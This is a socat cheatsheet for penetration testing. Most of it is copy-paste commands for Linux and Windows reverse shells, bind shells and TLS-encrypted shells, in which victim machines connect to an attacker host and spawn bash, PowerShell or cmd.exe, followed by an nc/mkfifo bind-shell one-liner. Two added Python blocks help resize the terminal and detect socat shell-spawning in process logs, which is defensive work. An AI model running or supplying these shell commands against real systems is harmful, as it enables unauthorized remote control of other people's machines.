Socat Cheatsheet - Better netcat

Socat is used to establish a more stable shell than netcat provides. Features:

  • Use of the arrow keys
  • Allows interactive commands such as sudo
  • Use of CTRL + S, CTRL + C

Reverse Shell for Linux

Attacker:

  • socat TCP-L:<port> FILE:tty,raw,echo=0

Victim:

  • socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Additional step:

Open a new terminal on your own machine and run stty -a; record the values of rows and columns.

Next, in your reverse/bind shell, type stty rows <number> and stty cols <number>, filling in the numbers you recorded from running the command in your own terminal.

This changes the width and height the remote terminal has registered, so programs such as text editors, which rely on that information being accurate, open correctly.
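The additional step above is easy to get wrong by hand, so here is a small helper, added here as an example and not part of the original cheatsheet. It parses the text that stty -a prints and builds the single stty command to type into the remote shell. It goes beyond the page in one way: it understands both the GNU/Linux layout ("rows 50; columns 200") and the BSD/macOS layout ("50 rows; 200 columns"). The two STTY_* samples are constructed, and the function names are mine.

```python
import re

# Constructed sample of `stty -a` output, GNU coreutils (Linux) layout.
STTY_GNU = """speed 38400 baud; rows 50; columns 200; line = 0;
intr = ^C; quit = ^\\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;
"""

# Constructed sample of `stty -a` output, BSD/macOS layout.
STTY_BSD = """speed 9600 baud; 50 rows; 200 columns;
lflags: icanon isig iexten echo echoe -echok echoke -echonl echoctl
"""


def parse_terminal_size(stty_output: str):
    """Return (rows, columns) from the text printed by `stty -a`.

    Accepts both "rows N; columns M" (GNU) and "N rows; M columns" (BSD).
    Raises ValueError if either dimension cannot be found.
    """
    rows = re.search(r"\brows (\d+)\b|\b(\d+) rows\b", stty_output)
    cols = re.search(r"\bcolumns (\d+)\b|\b(\d+) columns\b", stty_output)
    if not rows or not cols:
        raise ValueError("could not find rows/columns in stty output")
    r = int(rows.group(1) or rows.group(2))
    c = int(cols.group(1) or cols.group(2))
    return r, c


def stty_resize_command(stty_output: str) -> str:
    """Build the one-line stty command to type into the remote shell."""
    r, c = parse_terminal_size(stty_output)
    return f"stty rows {r} cols {c}"


if __name__ == "__main__":
    import subprocess

    # Try the real local terminal first; fall back to the constructed
    # sample when stdin is not a tty (e.g. run from a script or CI).
    try:
        out = subprocess.run(
            ["stty", "-a"], capture_output=True, text=True, check=True
        ).stdout
    except (OSError, subprocess.CalledProcessError):
        out = STTY_GNU
    print(stty_resize_command(out))
```

Run it in the terminal you will use for the shell and paste the printed line into the remote shell; stty accepts rows and cols in one invocation, so the two commands from the step above collapse into one.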

Reverse Shell for Windows

Attacker:

  • socat tcp-l:<port> -

Victim:

  • If you want to spawn PowerShell: socat tcp:<attacker_ip>:<attacker_port> EXEC:powershell,pipes
  • If you want to spawn a command prompt: socat tcp:<attacker_ip>:<attacker_port> EXEC:cmd.exe,pipes

Then refer to the additional step.

Encrypted Shell

  1. Generate a certificate: openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
  2. Merge key and cert together: cat shell.key shell.crt > encrypt.pem
  3. Decide whether to use a reverse shell or a bind shell.

Encrypted Reverse Shell for Linux

  1. Set up a listener on the attacker: socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 FILE:tty,raw,echo=0

  2. Target machine connects back to the attacker: socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

  3. Refer to the additional step

Encrypted Reverse Shell for Windows

  1. Set up a listener on the attacker machine: socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 -

  2. Target machine connects back to the attacker: socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 -

  3. Refer to the additional step

Encrypted Bind Shell for Linux

Note: A bind shell requires moving the .pem file to the target.

  1. Set up a listener on the victim: socat OPENSSL-LISTEN:<PORT>,cert=encrypt.pem,verify=0 EXEC:/bin/bash

  2. Attacker connects to the open port on the victim machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

  3. Refer to the additional step

Encrypted Bind Shell for Windows

Note: A bind shell requires moving the .pem file to the target.

  1. Set up a listener on the victim: socat OPENSSL-LISTEN:<PORT>,cert=encrypt.pem,verify=0 EXEC:powershell,pipes

     If you want the command prompt: socat OPENSSL-LISTEN:<PORT>,cert=encrypt.pem,verify=0 EXEC:cmd.exe,pipes

  2. Attacker connects to the open port on the victim machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

  3. Refer to the additional step
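Every victim-side command on this page has the same shape: a socat network address (TCP, TCP-L, OPENSSL, OPENSSL-LISTEN) wired to an EXEC address that spawns bash, /bin/bash, powershell or cmd.exe, usually with pty/pipes options and, for the encrypted variants, verify=0. That shape is what a defender should look for in process-creation telemetry. The detection below is an added example, not from the cheatsheet; the SAMPLE_CMDLINES are constructed, the IP 203.0.113.5 is a documentation address, and the function and pattern names are mine. It deliberately ignores legitimate socat uses such as port forwarding or talking to a Unix socket, which have no shell-spawning EXEC address.

```python
import re
from dataclasses import dataclass, field

# Constructed process command lines, as a process-creation log would record
# them. The first three mirror the victim-side commands on this page; the
# rest are benign socat/nc uses that must not be flagged.
SAMPLE_CMDLINES = [
    'socat TCP:203.0.113.5:4444 EXEC:"bash -li",pty,stderr,sigint,setsid,sane',
    'socat OPENSSL-LISTEN:8443,cert=encrypt.pem,verify=0 EXEC:/bin/bash',
    'socat tcp:203.0.113.5:4444 EXEC:powershell,pipes',
    'socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80',      # plain port forward
    'socat - UNIX-CONNECT:/var/run/docker.sock',        # local socket client
    'nc -lvnp 4444',                                    # not socat at all
]

# EXEC address whose program is a shell: sh/bash/zsh/dash (optionally /bin/),
# or the Windows shells used on this page.
SHELL_EXEC = re.compile(
    r"EXEC:[\"']?(?:/bin/)?(?:ba|z|da)?sh\b|EXEC:[\"']?(?:powershell|cmd\.exe)\b",
    re.IGNORECASE,
)
# A socat network address, either connecting or listening.
NET_ADDRESS = re.compile(
    r"\b(?:TCP4?|TCP6|OPENSSL|UDP|SCTP)(?:-L|-LISTEN)?:", re.IGNORECASE
)
# Options that make the spawned process interactive.
TTY_OPTIONS = re.compile(r"\b(?:pty|pipes|setsid)\b", re.IGNORECASE)


@dataclass
class Finding:
    cmdline: str
    reasons: list = field(default_factory=list)


def classify_socat(cmdline: str):
    """Return a Finding if the command line looks like socat wiring a
    network socket to an interactive shell; otherwise return None."""
    if not re.match(r"^\s*socat\b", cmdline):
        return None
    reasons = []
    if SHELL_EXEC.search(cmdline):
        reasons.append("EXEC address spawns a shell")
    if NET_ADDRESS.search(cmdline):
        reasons.append("network address present")
    if TTY_OPTIONS.search(cmdline):
        reasons.append("pty/pipes/setsid options typical of interactive shells")
    if re.search(r"\bverify=0\b", cmdline):
        reasons.append("TLS with certificate verification disabled")
    # Both core ingredients are required: a network endpoint and a shell.
    # Extra reasons only raise confidence; they never flag on their own.
    if "EXEC address spawns a shell" in reasons and "network address present" in reasons:
        return Finding(cmdline, reasons)
    return None


def scan(cmdlines):
    """Run classify_socat over a batch of command lines and keep the hits."""
    return [f for f in (classify_socat(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding.cmdline)
        for reason in finding.reasons:
            print("   -", reason)
```

The same patterns translate directly into an EDR or SIEM rule on the process command line; in practice you would also pair a socat EXEC hit with the parent process and with an outbound connection to a non-corporate address, since the unencrypted variants on this page are also visible on the wire as an interactive shell session.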

One tool I found helpful for creating reverse and bind shells: https://www.revshells.com/

However, I found the nc bind shell to be wrong. This is what it should be: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp [port] > /tmp/f